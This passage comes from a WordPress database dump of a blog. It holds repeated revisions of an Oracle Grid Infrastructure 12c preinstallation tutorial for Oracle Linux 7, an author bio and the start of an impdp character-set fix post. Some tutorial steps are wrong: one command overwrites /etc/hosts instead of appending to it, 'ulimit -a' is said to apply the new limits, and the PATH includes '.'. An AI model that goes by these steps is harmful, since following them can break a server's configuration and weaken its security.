enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 10:14:34','2020-02-02 10:14:34','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(48,2,'2020-02-02 10:15:48','2020-02-02 10:15:48','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 10:15:48','2020-02-02 10:15:48','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(49,2,'2020-02-02 10:16:28','2020-02-02 10:16:28','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 10:16:28','2020-02-02 10:16:28','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(51,2,'2020-02-02 10:24:14','2020-02-02 10:24:14','<img width=\"800\" height=\"666\" src=\"http://ictbank.ir/blog/wp-content/uploads/2024/04/HIXQ6420-1024x853.jpg\" alt=\"\" /> \n <!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --><!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph --> \n <style>/*! elementor - v3.20.0 - 10-04-2024 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2><a href=\"http://ictbank.ir/blog/wp-content/uploads/2024/04/CV-DBA.pdf\">My Resume</a></h2>','About Me','','publish','closed','closed','','about-me','','','2024-04-14 10:50:01','2024-04-14 10:50:01','',0,'http://ictbank.ir/blog/?page_id=51',0,'page','',0),
(52,2,'2020-02-02 10:24:14','2020-02-02 10:24:14','<!-- wp:paragraph -->\n<p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','About Me','','inherit','closed','closed','','51-revision-v1','','','2020-02-02 10:24:14','2020-02-02 10:24:14','',51,'http://ictbank.ir/blog/index.php/2020/02/02/51-revision-v1/',0,'revision','',0),
(56,2,'2020-02-02 12:16:02','2020-02-02 12:16:02','<!-- wp:paragraph -->\n<p>If the Character set of source and destination database are not equal, you will see below errors in the impdp log file: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">ORA-02374: conversion error loading table \"SCHEMA1\".\"TABLE1\" ORA-12899: value too large for column COLUMN1 (actual: 101, maximum: 100)</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p> to solve this error, you have to restore the <strong>structure of tables</strong> first </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">impdp schemas=schema1 dumpfile=dump.dmp logfile=log.log directory=dumps content=<b>METADATA_ONLY</b></pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to create a table and fill it with information about columns with have CHAR or VARCHAR datatype:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre class=\"wp-block-syntaxhighlighter-code\">CREATE TABLE SEMANTICS$\n(S_OWNER VARCHAR2(40),\nS_TABLE_NAME VARCHAR2(40),\nS_COLUMN_NAME VARCHAR2(40),\nS_DATA_TYPE VARCHAR2(40),\nS_CHAR_LENGTH NUMBER);\n\nINSERT INTO SEMANTICS$\n SELECT C.OWNER, C.TABLE_NAME, C.COLUMN_NAME, C.DATA_TYPE, C.CHAR_LENGTH\n FROM ALL_TAB_COLUMNS C, ALL_TABLES T\n WHERE C.OWNER = T.OWNER\n AND T.OWNER IN (\'[b]SCHEMA1[/b]\')\n -- ALL ORACLE PROVIDED USERS \n AND C.TABLE_NAME = T.TABLE_NAME\n AND C.CHAR_USED = \'B\' -- ONLY NEED TO LOOK FOR TABLES WHO ARE NOT YET CHAR SEMANTICS. \n AND T.PARTITIONED != \'YES\' -- EXCLUDE PARTITIONED TABLES\n AND C.TABLE_NAME NOT IN (SELECT TABLE_NAME FROM ALL_EXTERNAL_TABLES)\n AND C.DATA_TYPE IN (\'VARCHAR2\', \'CHAR\');\n COMMIT;</pre>\n<!-- /wp:syntaxhighlighter/code -->\n\n<!-- wp:paragraph -->\n<p>then you have to modify these fields with alter table command as below: </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:syntaxhighlighter/code -->\n<pre 